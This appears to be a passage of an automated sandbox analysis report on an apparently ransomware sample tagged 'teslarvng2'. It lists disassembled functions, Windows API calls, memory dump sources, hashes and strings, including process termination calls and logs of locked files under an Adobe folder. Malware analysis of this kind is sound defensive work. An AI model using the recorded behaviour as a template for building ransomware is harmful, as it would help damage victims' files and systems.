                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E68956
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E689CD
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00E68A3E
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E68A60
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E68A82
                                                                    • CreateThread.KERNEL32 ref: 00E68AB9
                                                                    • CreateThread.KERNEL32 ref: 00E68D0E
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00E68D86
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E68D90
                                                                    • SetEvent.KERNEL32(00000000), ref: 00E68DA5
                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00E6902B
                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00E69121
                                                                    • CloseHandle.KERNEL32(?), ref: 00E68DB1
                                                                      • Part of subcall function 00E68470: CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000004,00000080,00000000,00ED9C6C,00000000,00000000), ref: 00E6864E
                                                                      • Part of subcall function 00E68470: SetFilePointerEx.KERNEL32(00000000,00F2C310,00000002), ref: 00E68686
                                                                      • Part of subcall function 00E68470: WriteFile.KERNEL32(00000000,?,?,00F2C2B8,00000000), ref: 00E686A7
                                                                      • Part of subcall function 00E68470: FlushFileBuffers.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686AE
                                                                      • Part of subcall function 00E68470: CloseHandle.KERNEL32(00000000,?,00F2C2B8,00000000), ref: 00E686B5
                                                                      • Part of subcall function 00E68470: __Mtx_unlock.LIBCPMT ref: 00E68805
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Create$EventFile$CloseHandle$Mtx_destroy_in_situMtx_init_in_situThread$BuffersFlushMtx_unlockObjectPointerSingleWaitWrite
                                                                    • String ID: .txt$\ProgramData\Adobe\Extension Manager CC\Logs\$\ProgramData\Adobe\Extension Manager CC\Logs\fails.txt$\ProgramData\Adobe\Extension Manager CC\Logs\lockeds.txt$\\?\c:$teslarvng2
                                                                    • API String ID: 124366935-3833384678
                                                                    • Opcode ID: 1967aa20fe659c71164111350c08cddf6438909ad6bd5929f81f309cf658c363
                                                                    • Instruction ID: 54d98fce15188de699cc37da229acb4138800a97fb872f5b82bee98cdb15e3eb
                                                                    • Opcode Fuzzy Hash: 1967aa20fe659c71164111350c08cddf6438909ad6bd5929f81f309cf658c363
                                                                    • Instruction Fuzzy Hash: 09D28A70D00258DFDB14CFA8C945BDDBBB0BF59304F149299E409BB2A2DB71AA85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00001040,00000000,00000000,A6ABE2D4,00000000,00000000,00000003), ref: 00E8450A
                                                                    • _wcschr.LIBVCRUNTIME ref: 00E84585
                                                                    • _wcschr.LIBVCRUNTIME ref: 00E84590
                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,00000000), ref: 00E84618
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E8479A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E847BF
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00E84884
                                                                    • GetModuleFileNameExW.PSAPI(00000000,00000000,00000000,00000190), ref: 00E84899
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E848B6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E848E1
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E8490C
                                                                    • NtTerminateProcess.NTDLL ref: 00E84930
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84936
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E84941
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,00000003), ref: 00E84992
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process$Open$_wcschr$FileInformationModuleNameQuerySystemTerminate
                                                                    • String ID: UNC$c:\windows\
                                                                    • API String ID: 2091415205-1809659413
                                                                    • Opcode ID: 653b4b6e70d0b9e6b03d3897d137165a369ee53419dc006478231489222c218e
                                                                    • Instruction ID: 251125e3c6adb5f8ca78fdfffc365c50ff5cbcbdcb3921b3158ded769c3fcddc
                                                                    • Opcode Fuzzy Hash: 653b4b6e70d0b9e6b03d3897d137165a369ee53419dc006478231489222c218e
                                                                    • Instruction Fuzzy Hash: 6022A0B1D0021A9FCB14EFA8DC85BAEBBB4EF09314F145169E81DBB291E731AD45CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(A6ABE2D4,00000000,00000000,?,?,?,?,?,00000000,00EC6256,000000FF,?,00E5E500,?), ref: 00E61921
                                                                    • NtSetInformationProcess.NTDLL ref: 00E61935
                                                                    • GetCurrentProcess.KERNEL32(00000021,00EEF9D4,00000002,?,?,?,?,?,00000000,00EC6256,000000FF,?,00E5E500), ref: 00E61A37
                                                                    • NtSetInformationProcess.NTDLL ref: 00E61A46
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E6222F
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E62998
                                                                    • GetLastError.KERNEL32 ref: 00E629A6
                                                                      • Part of subcall function 00EAEBD8: _free.LIBCMT ref: 00EAEBEB
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E62B2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentFileInformationMove$ErrorLastMtx_unlock_free
                                                                    • String ID: list too long$teslarvng2
                                                                    • API String ID: 2522134232-3870459067
                                                                    • Opcode ID: 892e1b95815c615480589a4840160018e61f30b4876fff2114718c9b9dfadb87
                                                                    • Instruction ID: 5b791025bbfc5c352dae38ade1849f1e97cda3b06ec027cfc0ba87b6feac6a92
                                                                    • Opcode Fuzzy Hash: 892e1b95815c615480589a4840160018e61f30b4876fff2114718c9b9dfadb87
                                                                    • Instruction Fuzzy Hash: 22C28A70C05758CEDB24DFA8C9457EDBBB0BF59308F109289D4097B2A2DBB46A88CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00EB4134,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EBF640
                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EB4134,?,?,?,00000055,?,-00000050,?,?), ref: 00EBF66B
                                                                    • _wcschr.LIBVCRUNTIME ref: 00EBF6FF
                                                                    • _wcschr.LIBVCRUNTIME ref: 00EBF70D
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EBF7D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                    • String ID: utf8
                                                                    • API String ID: 4147378913-905460609
                                                                    • Opcode ID: 39612208930b2ffac11716231232a8ca2e9b0dda55ae79a140b7a68c057d765e
                                                                    • Instruction ID: 20c3f5c47d280d80c3ee4f341b75238f8cdc85292f77bcac714fa8cd7250b771
                                                                    • Opcode Fuzzy Hash: 39612208930b2ffac11716231232a8ca2e9b0dda55ae79a140b7a68c057d765e
                                                                    • Instruction Fuzzy Hash: 9F71D531600716AADB25AF75DC46BEB73E8EF49704F14647AF905FB181EA70ED4086A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(00000000), ref: 00E85E4D
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000514), ref: 00E85E5B
                                                                    • NtTerminateThread.NTDLL ref: 00E85E7E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E85E83
                                                                    • CreateThread.KERNEL32 ref: 00E85EA1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E85EB1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E85EBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: f650b3620f54f552883fa76d9946af6c0087ab32049faec4c79a41bf8ede49da
                                                                    • Instruction ID: a8886e1c130b168fa14822310755d36e0725336dbaccee44bae022ac43549862
                                                                    • Opcode Fuzzy Hash: f650b3620f54f552883fa76d9946af6c0087ab32049faec4c79a41bf8ede49da
                                                                    • Instruction Fuzzy Hash: 5E5159B1C04748DFCB20CFA5C945B9EBBF5EF48710F10826AE855A7291EB71AA09CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(00000000,A6ABE2D4), ref: 00E8607D
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000514), ref: 00E8608B
                                                                    • NtTerminateThread.NTDLL ref: 00E860AE
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E860B3
                                                                    • CreateThread.KERNEL32 ref: 00E860D1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E860E1
                                                                    • ResetEvent.KERNEL32(00000000), ref: 00E860EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: 2abac10067fbc8a81747a13c928bad4c0fc364447c28935ea9d66b65347e3850
                                                                    • Instruction ID: 171a6869e352bf47b4d32da583dde46b8f7fccad4111a69e67fcf41870b08b26
                                                                    • Opcode Fuzzy Hash: 2abac10067fbc8a81747a13c928bad4c0fc364447c28935ea9d66b65347e3850
                                                                    • Instruction Fuzzy Hash: DF514A75D04348DFCB208FA5D845BDEBBB5EB48710F10822AE859B7390DB71A945CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,A6ABE2D4,00000000), ref: 00E862E7
                                                                    • WaitForSingleObject.KERNEL32(?,00000514), ref: 00E862F5
                                                                    • NtTerminateThread.NTDLL ref: 00E86318
                                                                    • CloseHandle.KERNEL32(?), ref: 00E8631D
                                                                    • CreateThread.KERNEL32 ref: 00E86341
                                                                    • ResetEvent.KERNEL32(?), ref: 00E86351
                                                                    • ResetEvent.KERNEL32(?), ref: 00E8635A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$ResetThread$CloseCreateHandleObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 1318836089-0
                                                                    • Opcode ID: df3688dd2187e87d91a65b56b5035728cfe7110ba4be303269f6a8b21dde5a2b
                                                                    • Instruction ID: 567104f7f32fc958239c9c98931edac6212976c2db9f560c98a8921203fdbbeb
                                                                    • Opcode Fuzzy Hash: df3688dd2187e87d91a65b56b5035728cfe7110ba4be303269f6a8b21dde5a2b
                                                                    • Instruction Fuzzy Hash: D9418B71904209EFCB109FA5CC59B9EFBB5FF48710F10422AE819B3290DB76690ACF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: de78d6e96e49bc2022f5b5423dbf63786fb793a6a0a4bec64a2f262e4a125d2f
                                                                    • Instruction ID: cb2325b776820399e289a24704402f2237a6991a4b10519a81eb3d6babe55ec8
                                                                    • Opcode Fuzzy Hash: de78d6e96e49bc2022f5b5423dbf63786fb793a6a0a4bec64a2f262e4a125d2f
                                                                    • Instruction Fuzzy Hash: 80C23C71E046288FCB24CE28DE40BE9B7B5EB49305F1451EED44EB7241D776AE828F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00EC0044,00000002,00000000,?,?,?,00EC0044,?,00000000), ref: 00EBFDBF
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00EC0044,00000002,00000000,?,?,?,00EC0044,?,00000000), ref: 00EBFDE8
                                                                    • GetACP.KERNEL32(?,?,00EC0044,?,00000000), ref: 00EBFDFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: caad9e47476bf93278686f7cb49dfda17d0282780d824c6b6267190aea07e6ce
                                                                    • Instruction ID: c2cddb772dce8e3b439dd62ba9b88024b9625e55a5ab5e0bedb9a404336ddb10
                                                                    • Opcode Fuzzy Hash: caad9e47476bf93278686f7cb49dfda17d0282780d824c6b6267190aea07e6ce
                                                                    • Instruction Fuzzy Hash: AA210732A00101AEEB318F24CC01BE7B3A6EF54B6CB569174EA0AFB114E732DE41C390
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll,SystemFunction036,?,00000000,?,00E5A4C9,000001F4,000001F4,000001F4,000001F4,000001F4,000001F4,A6ABE2D4,?,00000000), ref: 00E8CD0A
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00E8CD11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Advapi32.dll$SystemFunction036$rtl failed,contact support
                                                                    • API String ID: 2574300362-1663652356
                                                                    • Opcode ID: d58d249ba7fc269d771f5ecf4a2d56768efb4ea6b344ac37fa19a2001f67a624
                                                                    • Instruction ID: 670a1b2d5a4260862921962bab039f3518ba93dae26bf6c547a24750b37298ce
                                                                    • Opcode Fuzzy Hash: d58d249ba7fc269d771f5ecf4a2d56768efb4ea6b344ac37fa19a2001f67a624
                                                                    • Instruction Fuzzy Hash: 9CE022B29402689A8534BB696C0AA9A3959E3C271AB21213AED0EF2190E731440742B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB555B
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB5591
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EC0007
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00EC0050
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00EC005F
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EC00A7
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EC00C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 949163717-0
                                                                    • Opcode ID: 1dc1753f8f65cb7680d34cd70e65cb370ca626b240255bfd7abb2a61e0459e6e
                                                                    • Instruction ID: 2b709d711300cfd2d621028b2b595b2a04098c543bdbd9edf36b96e1c6f18e10
                                                                    • Opcode Fuzzy Hash: 1dc1753f8f65cb7680d34cd70e65cb370ca626b240255bfd7abb2a61e0459e6e
                                                                    • Instruction Fuzzy Hash: DC515972A00209AEDB20DFA5DC42FFBB3B9AF09704F055439F514FB190EB729A458B60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB555B
                                                                      • Part of subcall function 00EB54F9: _free.LIBCMT ref: 00EB5591
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EBF9F4
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EBFA3E
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EBFB04
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale$ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 3140898709-0
                                                                    • Opcode ID: 35cfe8d1c521c1bdb748f8ec3a1e27e2bcf6a422bd757bdf45df8df035fe2855
                                                                    • Instruction ID: 8ae55d445ebfddcd588fb10a80de93faabcc973729c2a75a6c1495ba2b1c0664
                                                                    • Opcode Fuzzy Hash: 35cfe8d1c521c1bdb748f8ec3a1e27e2bcf6a422bd757bdf45df8df035fe2855
                                                                    • Instruction Fuzzy Hash: 07619E759002079FEB289F28CD92BFBB7A8EF04314F1051BAE905F6585EB34E985CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00EABEFB
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00EABF05
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00EABF12
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 8aa14d8955b8a997f458c91ea52c961a71f7c91c7670446aa39e1361d8ab96bf
                                                                    • Instruction ID: 75c43cd66c2f9cd8e2dbff97746a91bff49f092c130266146cb2cb138d986df9
                                                                    • Opcode Fuzzy Hash: 8aa14d8955b8a997f458c91ea52c961a71f7c91c7670446aa39e1361d8ab96bf
                                                                    • Instruction Fuzzy Hash: 5631D374D0121C9BCB21DF64DD88B9DBBF8AF48310F5051EAE41CAA261EB70AB858F44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00E735BB,?,00EAF01D,?,?,00E735BB,?,00E735BB,00000001), ref: 00EAF040
                                                                    • TerminateProcess.KERNEL32(00000000,?,00EAF01D,?,?,00E735BB,?,00E735BB,00000001), ref: 00EAF047
                                                                    • ExitProcess.KERNEL32 ref: 00EAF059
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: cedbf8a0730438b6e049fd9181f417ff8da6877b68ebc1c2455e54b9aedd5d4d
                                                                    • Instruction ID: 3a2c88c7fb36bfadd77138f7ff4e1058133b9b81730513d5cdb6b134b3476d3e
                                                                    • Opcode Fuzzy Hash: cedbf8a0730438b6e049fd9181f417ff8da6877b68ebc1c2455e54b9aedd5d4d
                                                                    • Instruction Fuzzy Hash: 68E0B631005148EFCF626B99DC49E493B69EB56746F005434F805AA132CB3BED82DA54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
